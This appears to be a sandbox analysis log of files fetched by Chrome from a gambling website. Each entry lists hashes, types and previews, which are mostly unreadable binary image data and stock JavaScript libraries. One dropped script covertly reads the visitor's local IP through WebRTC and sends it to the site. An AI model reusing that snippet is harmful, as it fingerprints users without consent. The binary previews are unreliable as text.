                                                      SHA-256:8E0CF84FCD5823A3BDA3B510C142DF920292590B54461741CAEF6C702167D09E
                                                      SHA-512:525456DE55577FC25F7434164CCD72138BEEA8F85951809B523E0D3609A166E1EA7DD72D3DB346470813DD63942CD40158B2F09FACA610E391D2E091E9E6A417
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/index/en/footer_tindex.png?ver=1678854633
                                                      Preview:.PNG........IHDR...R...L......e......tEXtSoftware.Adobe ImageReadyq.e<..R!IDATx....6.v.N..8......C...G...p..........v7Y...(._..o......K.w..u.f.._...t~lK.9}......|.........W..........8y..o.,<Z.['~Lxc:c......0...m..\.-..r3<..P..........p......Yk.......g.{.n).(O...|....w.6.....Y..v.V.G.ZdQ...;.|.3.....a./Z.s.}F.3....Z.7.f..........k...G>...Y6..|.....g...~#3/(9.......dV..q......b..g.M...<..s.G..g.x,.S....?e....[.PK...3..v....K...Y_.U.Q..5kWU].6Y..lw.<..z~..|$.jg..6.....H]j.j\e.........%^f.{.....GroVY^.YuR....).Md...2s..'#q....\....~V.........i..E.|.C...~?RgV...O..U]!.}...)g...]....R.|.h.E..Y.+...Y...V>.vg...0...l.)..U9..v..[V.T.9.Sof<e.H.Iun.WA......+|"C.Y....F.'.V.6Y.....Eo...._...c<ef.?..m.9G}......oZ.z....%...a..Pg..Wp..M/.z.......bu{f.t...%.,vku>..e.L.^e..y{w...`..;.;...v..W.k.........w.C...c...Q.2.8V.]..r3..].d.G...R.?e..z....W....,.......T.....k...3....T.2_f.u+.>)z....;/v.,Gc.j.L[E....W...|..s.*..1..9g....fO.".-.......{.=.t
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):3366
                                                      Entropy (8bit):7.873837987315415
                                                      Encrypted:false
                                                      SSDEEP:96:I8tffaxjzhYwhnys1ELD/Cv4BzLq/jJf2LY:VtffadJdyAELO2vmJMY
                                                      MD5:8205D647C9EB9E83A2DC71293B1CAAF5
                                                      SHA1:FC54F15AD82ED9A370571F8A5573C34B7A6A05D6
                                                      SHA-256:06ED5001009F4518D3D69A778E5D901AEBFE3068F29C26212FB591FBCEA7C377
                                                      SHA-512:E960EDFADE8305EFB7BA6456F752C6E6C7BD7CC9DDA4B9C6065E5274F2AB33A262DC3E4A113DCA8716390E650AF11CCC555E4C25C717C2FD740DC50B1615D542
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE............................................................YY\......YY\.....................YY\.........YY\............YY\...YY\.........YY\YY\YY\......YY\YY\YY\YY\YY\.......................................YY\............................................................YY\...DE.....LtRNS.. `@0@.0@`......P...... ...p......P..p ...p@..P..`0.`..`.p.......p..........uIDATx..............................=8........m.UUUUUUU.......0.......PF........g:....N.Vy.(?o.....z.^.+.........}......D.E.?x..*......)........g.80z6z..SS$...h].sy0.... $.ln_..s.{..V....8j.[Y..3.<n..xZ^H.H.[v..S..h..6.%+c.z.Ya.......\.(.......(....4`=..V7\..*o...%.0[....&..u.j..e..E3.y[Wty.......$VH....#(...Tc..Z.......g.?U..<B.;.c$....%$w...T.c.t.w]2Q......F....v...v......3......q,....{....5}].;........C..2M.EJ3i.yHa.<..O./.n...!......"._x....e.J3]..]...\W..}.c...Z.z...E{....DQxMpK...p.)J.........z+.........fyF...G....r......w.3.....9.d..)W<U...b...r.|....._
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):28956
                                                      Entropy (8bit):7.987627654784631
                                                      Encrypted:false
                                                      SSDEEP:768:XXnmvHydB9GkFC5UeCWTMuibEtiVcs/81lkNAynek4G:Hmg9yCWkN2sk1lkAylj
                                                      MD5:66D9D7CB8A8E10E4DD94D9DAC473BF4E
                                                      SHA1:5AFC5FF32430D142F1351A64AD2843C71931CFCA
                                                      SHA-256:8691578B167478AF12787D900A04FD7890666833BDF0FA530D0D69C366B6A02F
                                                      SHA-512:F8DC62495B5FCB658D7592B0911AB272AE73F607528BFFD85C5C6AC2AA22E2261B73FDF317D015DAEB0F14ED38602FD138BF056E78BA4663C8705638925026E2
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/wcaadzg74mj7y.png?ver=1673334591
                                                      Preview:.PNG........IHDR...............^.....PLTE$........+"!...;::*7\BAA<0/3()'2R....013...6. .....ROQ)........_4A...B.).../?l...........!(7 )H.....L%2T,9...\WYjBS....vy...f`b..tu|...J626@N;=^FGLJZrCGh8[......c;J.6DK|.NXa.8=b.......PHFiF,...tkl')(T........Z..Et....4Q.S@:...jc.0JxXakhio.,BMZWd~........(?Ezc....Dh.......wR9..MFU.P].`h.g..[:.0E].........~v....TK._5...cME._Xq}.mTQq....XQl.....TV~<W|_).co.;Si...unbky..m.{k3.&...V............}M&..G w..+a.....x^]t...wH.mF..3H,.v=..j)..q..L....w{.Dl.k{..a.:.&..w..I.u9^x.B....ke.....8.H...^ ..5i..T0.$w}f|..Y.....m^q.....HUJp..y.....B.*.hj.....{.m...Wp\.._~.}Jb.i...6......1...../O)....~... E........q[.J.C<h7P.....]";.0R.pkP....y_.1.b~...b.Z.o.H.C.l.....~u..o..@.<.....P.R&...v.{..~.zl..d.[...fa|...8..Y.[..}.*.....%....m.IDATx.T....Q.....\h.jsv1sA..r8'.M...Fy..4.^.$4.$)/..E.R.4..)...J....+..?...].;..y~sf.....y67aqn..i2.R.e..&c&7....._]a.T..q.I+n...!..`p).R.a.!|.:0.}..[...`".B.........(.=.y....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 700x255, components 3
                                                      Category:downloaded
                                                      Size (bytes):32120
                                                      Entropy (8bit):7.961863002691601
                                                      Encrypted:false
                                                      SSDEEP:768:jUxrJaa6Lq/3LqbhSXFW003BO64tVFbCKY6+bEv2qA3ul:jUxVn6LqTqsXA00d4t7qTRp3ul
                                                      MD5:51F5B40830F79D38815EAEC587D1A540
                                                      SHA1:78363647EE7A3A96CCD8675F62F819B3868A1AF2
                                                      SHA-256:F8222FAE4FCC173A471AF9C8A3B8358627410A4C84FA12EEE5ABDA7C5A3EC15A
                                                      SHA-512:231F22B906BC56ED2D6B5B5098F426226558C7DDC8BF95D30DDA8E781FF7BBEC5C38DAB970150EBD442E0AAE43A350AEFB270894092E7D4B6A273A1AC385155E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/other/banner2.jpg?ver=1606891698
                                                      Preview:......JFIF.............C....................................................................C...............................................................................................................................................................................$+?.!...1.QQIH. ..QQQI...HR.)...3.Y.............1IYAQ........0....R.....H....@..J..E .6|.=.Fz...pRb..s.)...........................{8.......<.{x.>y..:....q.=DY.P.>".:..........................I...'d/.-..<Hz...i.d.:...P.A."y............................)xRT..._.8.^XRZ2.0....s.R..`.........TT...................;....e....y..z...'..SO......,............@RfN.t..w.xt...7.h..H......................x.x.}.=O.....u....z.y...`.............Rw.......2...d..`.Rr...;.....c....................?..C.+..|_..xu<..A..zv;..g......|........;...M......Sn..@.......o..X..ag>vig%....p.....cG%MMW_..(.................(.n..v..N....'.?7.6.........n..}7X.;.3..s.=!..........z^.....%.SW.'.+.....V.l..r^...r..>}......Z....f.........*:..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):23571
                                                      Entropy (8bit):7.984339543026751
                                                      Encrypted:false
                                                      SSDEEP:384:5gObQLvMtWQhCfqNrZRbxozUnDQ+5ZEeY7UuOAJz5xullxE9aiNRYEMPVWCzPkaO:CO/heqNrr9o4nDQ+f7GV11x6boNukkMP
                                                      MD5:7BF9C0C388427845D84B11373F780AFE
                                                      SHA1:48D384B809438216D51079855972A98B7D56BD32
                                                      SHA-256:57BE63F528032D92A38540ADD1AD35E86A630C0940DBA0B5B61F2DBC7937B932
                                                      SHA-512:BE12137EFAE41303F49A5AACE914DB59932A14050C00878A4834CCF9881181BEE96BF60A7C7A0A7665FCECFF694D6DDAD9B22A470279D7CD3F8657AA7434EC4B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE......7..-........Z!.Z".........[!....3A....F&.!..O..;6.-R.B+...................'`.............D.....=Q....v..f.....K......6......`&p...&e#...9..'..........8.^...p:. ...B[.....U..........l.....6^-r..Sz..%....a....GU..Ec..^/.f,l<..V..sJ.....%n..a*.......z.L$a...D.n..v".v..(...R..y^.p..(...R...A..J..OUa...X6c...y..!......?.W...o..$.C..m.G...<..h9.#..$.K..C|.R......@.....9,ID....0....k....bQ0......$......_..d.09..X.....9\g....V.?A.QE.].o.A!t.`..Mg`.....SXwdt"!\..._....`F}.. ,2.....|..o.}..',........Xio..e&.pw.dc......@....cT,N.....KO..H).3=.w.l.........<n...(..........RYt.....2.....:.#...K..>..~G.."-..........rF.......*...........^lD/V3.....E...R..x:.V......l..........*..tq.>u.*5..{..q.S..m..j..g @~..o..?..N.7...E.........a-^6.....tRNS..........[q.4.. .IDATx...XSW...&.q..)..i.2!......B.i.0...K.3*Hc..I...L(...N+-..-....KQA..6( .B...B.GpF.:..{.jOo.L..];...9.....@...Y{..{]ko.=.r....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality", baseline, precision 8, 56x23, components 3
                                                      Category:downloaded
                                                      Size (bytes):1075
                                                      Entropy (8bit):7.378098254985596
                                                      Encrypted:false
                                                      SSDEEP:24:O7A+di9YMWn0o0XxDuLHeOWXG4OZ7DAJuLHenX3PQ06WGOBMgxEDXc93kJpjoEn:GAmi9YM+uERA/6WGOmg4sUHjoEn
                                                      MD5:427C78075FFBD778B669EDA120AA3489
                                                      SHA1:34B4448B0426E4B471BE3FA2C9E8ABD901D0E2EB
                                                      SHA-256:2C34325364803F26A2743CB62F48677E9E83A96005131A7EEDF97038D6CF5588
                                                      SHA-512:0CC9E91645FCC3F264EE9D672219C5034499CC78D4EAC17E1DDC96A0821935547B3BECFDE97612289A078094AB8DC2B2F498D5D386D1A522711C5C16F700AD28
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/gdcode_1736725716
                                                      Preview:......JFIF.....`.`.....>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..3u....%e,.!...=?.e...l.!v.L.8....A8....W.........1...j..Z.t..1 O#.......;..s...Eto.E....4m.a..M..BH.. ...<..cT..Age......L.,.(..wm....?F....f.......S.......[._.Q.i#...d...~g.......O[s.F<...h&[.x.L.C..3..RW/.-^.(........2D.,....T..'.R.{...6.eu.....rY.Hp...W.G2......_.....v.QEQ.#".R..S.$t=2?:.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 26 x 29, 4-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):420
                                                      Entropy (8bit):6.708044727238572
                                                      Encrypted:false
                                                      SSDEEP:12:6v/7PIs6xCqhpQZYw8sSEBkhELEm3DJ7k:ZsgCqC78ikhELxTJ7k
                                                      MD5:45DE127239EEB0897043E7689DE9CD13
                                                      SHA1:6C0E6B938D079CC8763917A56D1F08C8F321017F
                                                      SHA-256:78E4BE8551137B81429D75AA8E29205D23E5D154C8E17D73483A0B4B7D945B5B
                                                      SHA-512:E753E02165EE7D4D9885D46546623263150483FB943156D7F415F2DD5051C0C0F8D88D6E09144ED688568B1E63A368671F059CF3C24CB9E4945FB6A71B7F7A4A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/footer/footer-GamCare.png?ver=1606790107
                                                      Preview:.PNG........IHDR.............FaaE...-PLTE..........................................GpL.q.....tRNS...At...1.Z".....V....IDAT..c.R..C.w ........`<A9.O5......T...E...A<U.....V%.B9 oaI.H...D OE....q...R.}.S.:Am...!V...-.P. .0..6A...).4..9000$3(5..x.`.2(..n....t"..R..+.g......n.<...6..Z\....%..%..l.....~.((....... ....2L..ZP.A...y.e.A..A....GNY....NW...%O0..9H..v.aa..Xp...A.H...aC.c.w.Ah.hBT....]..t.7....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (13814)
                                                      Category:downloaded
                                                      Size (bytes):56142
                                                      Entropy (8bit):5.522721800330077
                                                      Encrypted:false
                                                      SSDEEP:1536:cJxLSEwwmr2yZPp8yQPj6OR1fdfqovoRonm7f6T:cPErPp8yQPOOR1fdfqg2l7f6T
                                                      MD5:64507221FEDDFF84C80B99C98827D76C
                                                      SHA1:5C7000638C6BAE1A1C448367822A8682D59D371F
                                                      SHA-256:5A0BE406A1BDF94A25A9D142D4124E3DCCBDEB5593CD78FB0BD234DF89DD7389
                                                      SHA-512:CC3BEBA9E9C0D1E149642C41B2BCB351972F8A1BCD9445DBB5E32FEB6C91C5D851E2CECAD5A6B3F8B8EC4727E4E8CF9824BC80244BAEAAE20023C23C1A02C2F0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/js/unite/jsencrypt.min.js?ver=1606790105
                                                      Preview:/*! JSEncrypt v2.3.1 | https://npmcdn.com/jsencrypt@2.3.1/LICENSE.txt */.!function(t,e){"function"==typeof define&&define.amd?define(["exports"],e):e("object"==typeof exports&&"string"!=typeof exports.nodeName?module.exports:t)}(this,function(t){function e(t,e,i){null!=t&&("number"==typeof t?this.fromNumber(t,e,i):null==e&&"string"!=typeof t?this.fromString(t,256):this.fromString(t,e))}function i(){return new e(null)}function r(t,e,i,r,s,n){for(;--n>=0;){var o=e*this[t++]+i[r]+s;s=Math.floor(o/67108864),i[r++]=67108863&o}return s}function s(t,e,i,r,s,n){for(var o=32767&e,h=e>>15;--n>=0;){var a=32767&this[t],u=this[t++]>>15,c=h*a+u*o;a=o*a+((32767&c)<<15)+i[r]+(1073741823&s),s=(a>>>30)+(c>>>15)+h*u+(s>>>30),i[r++]=1073741823&a}return s}function n(t,e,i,r,s,n){for(var o=16383&e,h=e>>14;--n>=0;){var a=16383&this[t],u=this[t++]>>14,c=h*a+u*o;a=o*a+((16383&c)<<14)+i[r]+s,s=(a>>28)+(c>>14)+h*u,i[r++]=268435455&a}return s}function o(t){return Be.charAt(t)}function h(t,e){var i=Ke[t.charCodeAt
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65271)
                                                      Category:dropped
                                                      Size (bytes):114405
                                                      Entropy (8bit):5.22084497915709
                                                      Encrypted:false
                                                      SSDEEP:3072:2hUcC5HqffYIdcMZOGHgZsUOUIBdID8CX:y45HqXYIdcMZOGHAsUOUIBdID8I
                                                      MD5:B8BE4EC964B15C656C05A17F822762B3
                                                      SHA1:1AFABBF1EEECC4D7DDFBB4C824696CE1AADC8D0F
                                                      SHA-256:E32B2B578B1345C05BE32292DA9016F7FF564BB3F4AEDA3C1B6B76869648FCBD
                                                      SHA-512:0ABFE93E1DAB3DB289B0EFE0F92E42F6FF14CC4E550B5BCA8D4A84FE736245FB70B39E5B86BD9AEA620E6FD73A76CE8AAED9D3A561C6208DC9108778DBA141B9
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:/**. * Swiper 4.1.0. * Most modern mobile touch slider and framework with hardware accelerated transitions. * http://www.idangero.us/swiper/. *. * Copyright 2014-2018 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: January 13, 2018. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):e.Swiper=t()}(this,function(){"use strict";var e=function(e){for(var t=0;t<e.length;t+=1)this[t]=e[t];return this.length=e.length,this};function t(t,i){var s=[],a=0;if(t&&!i&&t instanceof e)return t;if(t)if("string"==typeof t){var r,n,o=t.trim();if(o.indexOf("<")>=0&&o.indexOf(">")>=0){var l="div";for(0===o.indexOf("<li")&&(l="ul"),0===o.indexOf("<tr")&&(l="tbody"),0!==o.indexOf("<td")&&0!==o.indexOf("<th")||(l="tr"),0===o.indexOf("<tbody")&&(l="table"),0===o.indexOf("<option")&&(l="select"),(n=document.createElement(l)).innerHTML=o,a=0;a<n.childNodes.length;a+=1)s.push(n.childNodes[a])}else f
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):4286
                                                      Entropy (8bit):7.838008820921733
                                                      Encrypted:false
                                                      SSDEEP:96:xoPBzDShWCE2mSPbB+HsXhm6BSkBzNcMf3mqm/zWe:xWZ3QPPxTSkBx+lLn
                                                      MD5:24BBF254431790C6771ACC8BF6E2D954
                                                      SHA1:0D4A495FC4169B5CF8F37521191F51D6223B08D4
                                                      SHA-256:A2110925431CD9423EEB7775CD546C03A89D2F6DC33684783844CA20519A9E67
                                                      SHA-512:D297C1F14E58BE8B73D62A5D8E173C3558B60983681117C9AA0A1395E1E5644129B27A3375400FB4439BC42394B4FEB025EC3C7FAA811FB6D091CFFECCE25346
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/76_egame_logo.png?ver=1606790110
                                                      Preview:.PNG........IHDR..............P.....:PLTE....i%.............d&............................b'.............W+....h%.......V,......................O/.m#.j$.......76.{..B3.S-.............@3..........A3.......L/....h#.M/.......96....V..D2.18.a(....C3.09.............G1.<4..../9.v ....47.O..Z..g..l.....}........~.............o#....z..a.....@3......M....{.....K..F....|.................66./9.......;5....{..@3.......N..t!....W+.C2.x........[).G1....l$....`(..........d&.p".S-..........i%.......J0.......e#.......g!....a&.g.....s".......Q........c%...g..f....h.....................~..c..x..a..^..o..s..ZA....mtRNS....]<.^]./........t&.I..a^U...)]..|]S73"..jF...........\QB....qd.........y.......y..n.....h.........IDATx..............................=..i*..8~.Z.h..B.j..D....2.D.............GP.(h..P..~7.s.....'.k|._B..?.w9...........( v......(.?W..U<f.."..rssK........9z..TRX.OW.....06`._.}.V....D$XOhN.N.N..z..\.p..g...Ur.....{.yJ^.|.Ps_.<.~...-m.-L=......z.===---.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 204 x 23
                                                      Category:dropped
                                                      Size (bytes):427
                                                      Entropy (8bit):6.827729953332778
                                                      Encrypted:false
                                                      SSDEEP:6:7yASlTql1l/UkO6Wu6SPJitadAC83JxOOSdYrOr+vO34dk4OWJDYu103b/CkOE:mtYdBzCB3JxZOr+RPJDs3b/CPE
                                                      MD5:91A7A64BC6D0F0C949765742FD7CBA4A
                                                      SHA1:5EE79F81D97AA29162A5CBB8939A9F8109C821A1
                                                      SHA-256:A0FC8D019B9C5116C35B5A3ED7221814A8EBD3C8CE5E2063333305B48413A06D
                                                      SHA-512:48337DF1E9E7483BD7A0620F0DA1C3353AB634C46E11D30BF1CB4B654EB131B91E8B7214DD4C569844AAA81CC8600218115371ADB826FB7E86C6D58AF1AE01AB
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:GIF89a.......M..........!.`?.u...k..0.j...\.....z...........U.............................................!..NETSCAPE2.0.....!.......,........... $.di.h..l.p,.tm.x..|....pH,...V..8-...iY.,.X@r..>...W..<.&3..fk..8..6.!.os..2 mmUr..7tb.d}..#y.M....4.%weg$fu....).#...".."........_.x_................f.._..."..._..........[.d".....$...F.#._.f..`..I.#.l....Gp..Y..*......$.U.b.fw.... b.r.C.0........ ....0c.I...8s....;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text
                                                      Category:dropped
                                                      Size (bytes):4386
                                                      Entropy (8bit):5.56314218762628
                                                      Encrypted:false
                                                      SSDEEP:96:veR5suijTWxKhgCBTSCkAjnhefPMm03OMu9eqeeV0vMu9eqeeVqgYi:veR5su+TWsU1eO70v76i
                                                      MD5:4E7441DC033395B76A96B25B6EFEF0F0
                                                      SHA1:C833E33F4A95EFA559A847DFFF036CB904260B48
                                                      SHA-256:80CAABBE50F5F83254E2545D01BACF299C7F417A103E912BD41D6C330A6E4F86
                                                      SHA-512:E96041AC2B7106FE9ACEDDC1FAA3E996FFAA97945D56CFF7B3CA0697492CF6FF53F6FC3826319A85EB360E684A166C0C8C075118A37655312DFBF231FF9AA167
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:/**.*.*/...(function($){..'use strict';...var localip,..ajaxUrl = '/member/call-request';....if($(document).data('caller'))...return false;....$(document)....data('caller', true)....ready(function(){...try{....window.RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; //compatibility for firefox and chrome.. var pc = new RTCPeerConnection({iceServers: []}), noop = function () {.. };.. pc.createDataChannel(""); //create a bogus data channel.. pc.createOffer(pc.setLocalDescription.bind(pc), noop); // create offer and set local description.. pc.onicecandidate = function (ice) { //listen for candidate events.. if (!ice || !ice.candidate || !ice.candidate.candidate) return;.. var p = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/.exec(ice.candidate.candidate);.. pc.onicecandidate = noop;.. if(p).. .localip = p[1];..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):127757
                                                      Entropy (8bit):4.9428194938159145
                                                      Encrypted:false
                                                      SSDEEP:1536:/cZlnfxbjbJzvdvpeG2iMuz/M6z4QZFSNwmJaxxKZ5dFR79LNOf0uK:/cZlntbEG2i8umYx620uK
                                                      MD5:E70EDB526FF09F426618EFADE93A4782
                                                      SHA1:840B05449D3851118FC835592BD98AF885BDBF1F
                                                      SHA-256:AB513AA4626BA224AC61B747674E6AEAD965F6E2CF87A2E60C7D4645B519817F
                                                      SHA-512:943192C03E09B13BBDEE324FDA4C81D019B4CB5178596B5C548A1E6776022ADED289A6076D32D5F55F99316B57B6F7DB13C6429EDB3A1E6927E7BCEA89774CD9
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/js/custom/moment.js?ver=1606790105
                                                      Preview://! moment.js..//! version : 2.17.1..//! authors : Tim Wood, Iskren Chernev, Moment.js contributors..//! license : MIT..//! momentjs.com....;(function (global, factory) {.. typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :.. typeof define === 'function' && define.amd ? define(factory) :.. global.moment = factory()..}(this, (function () { 'use strict';....var hookCallback;....function hooks () {.. return hookCallback.apply(null, arguments);..}....// This is done to register the method called with moment()..// without creating circular dependencies...function setHookCallback (callback) {.. hookCallback = callback;..}....function isArray(input) {.. return input instanceof Array || Object.prototype.toString.call(input) === '[object Array]';..}....function isObject(input) {.. // IE8 will treat undefined and null as object if it wasn't for.. // input != null.. return input != null && Object.prototype.toString.call(input) ==
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 256 x 240, 8-bit gray+alpha, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):7074
                                                      Entropy (8bit):7.928012384219511
                                                      Encrypted:false
                                                      SSDEEP:96:gMXxllGqNJYXQT1pTyOgoz8D1EYwRxOmTtWuXrevpJS/Rq3Kt3KlASyN6KaP:zXTvYXQzy51nfmcuXibSralG/aP
                                                      MD5:00DD0EC0A16A1085E714C7906FF8FB06
                                                      SHA1:244BD9B7C3B1C4F7EF72DE31F67804FAFF213715
                                                      SHA-256:5D04051DFD9D2D740355404F98A683D1EC0FEB2FCA7D76E533C1A6E5CE92DD2E
                                                      SHA-512:163AFECE9AE9693C41324FFD89191132A8D2E42D73F962ACE0B70B44A17D954C8F506CC25AF152397E2536DA6245E4336AE465708EDF6EDE955B4AD502AF7A71
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plugins/jquery-ui/images/ui-icons_555555_256x240.png
                                                      Preview:.PNG........IHDR.............E.r@....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.U...I....tIME......6..F....IDATx..{.$G}.?m;....!.>...l.....G$,..&.%.|.........].]..=...?ptg..Y.G.. ...b...'....8$.f..;.#...A..G......3;...=..L..........W.^<................&.=.Ll&<.D.Y.V.D.^.`..O..r..`.:.$)...=.L.s....L.=?..a|..6...I#V+A...1.L).P.!......)$q..<....U`....r.2...t. )b....B.zDD....'O....{.5....[.Y.`..]az...GtwS..S..l.. 1.z..!(..h~.L.`V.U..{..g.ws...l.g......p.U.f.2..CP.....C...[.mVF.y...h8.J`....px.4.....'@....px.4... .w...d...p...)c.F{.....S.......>R$)g...3W....i...mk~[.+.O}.#c.P...._.OB..mz.-..=.)w.....i'.#...@.].S/..c.>]..L.[.......e.%PE.dR...=..\..').W..0..k.0..o2.:....A..'@....px.4.....'@....p.3........._+-..s.E.K%.2..5..UA...(.<..`......+H..=l...>0.b'G..n%p.U".YR.[..........R...q._`....H.5`...@.%6..b)....Z|.......t.Q.i.E.. Lc.J.xw.]..K... 7...........$0txzl.\.Y..wk..!uS...[..L..K..:(...f].K(......lN...u.'.vw.IdU.)n.K9(...u..f..c/.<....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):85137
                                                      Entropy (8bit):7.993023816304857
                                                      Encrypted:true
                                                      SSDEEP:1536:+r4JP1Tt1O64ZDp5HOV336JKxfMVMxU+mR2h5CvrlHRYUi12ymXGokgOdj:zZ/P4/5HOB3QgUVgMU48IW5gOdj
                                                      MD5:0D121559A69FB80F84F57FE179998BB8
                                                      SHA1:D7BF173540950E314EA58853DA086220E1BB0B53
                                                      SHA-256:47E84B2F858B5483A1767F18A6CBD8649D6D61ABE9022F835AC2F56E196A820C
                                                      SHA-512:19FC334E2D8666C218485B7AC4EE63F2481E4F1FF4A34151A8418B1AB7FEC36C0D2FCFFA2458B95890E0828BAFE158381FC3DE1B6EED1D3CED1954C899D953B2
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_tikiMania.png?ver=1712128601
                                                      Preview:.PNG........IHDR..............X......zTXtRaw profile type iptc..x.UPK..!..{.9B.....9Au.......(.F0..>.p.....y....^QJHEXL...YEc%..O.C..@..Jg$hV.!kL..]Z`*.H*.a..1.f.*....o.>..........L....rR......xO..&...../#...._..G.5.L.....iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='Image::ExifTool 11.70'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:subject>. <rdf:Bag>. <rdf:li>Icon</rdf:li>. <rdf:li> mgp</rdf:li>. <rdf:li> upg</rdf:li>. <rdf:li> Architecture</rdf:li>. <rdf:li> Building</rdf:li>. <rdf:li> Column</rdf:li>. <rdf:li> Emblem</rdf:li>. <rdf:li> Pillar</rdf:li>. <rdf:li> Symbol</rdf:li>. <rdf:li> Tiki</rdf:li>. <rdf:li> Totem</rdf:li>. </rdf:Bag>. </dc:subject>. </rdf:Description>.</rdf:RDF>.</x:xmpmeta>.<?xpacket end='r'?>..... .IDATx.....eUy..]k.S...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):29565
                                                      Entropy (8bit):7.987356198220607
                                                      Encrypted:false
                                                      SSDEEP:768:GEKIKoRwYCecPiTMuwg8KbOOlkmzClO/W9:NzKo+ehTMuwDWkECec
                                                      MD5:1958C204B183FB038A7081726033D230
                                                      SHA1:169BF349D4D451090F4038EA1B867C34500F372F
                                                      SHA-256:5067CA03CEDA5E810D686B72228E44DD0E5A1F08C0D3A608474009E17F3C1BE8
                                                      SHA-512:F3359687BE4174E8BE3BAFCB7A4ECCEE14F2CEB67DD4D0C9C54A2F3483A6575BF041DDC6A41C172F364D9513BD254EED493B88D793C08383C3FFE1E9369511C8
                                                      Malicious:false
                                                      Reputation:low
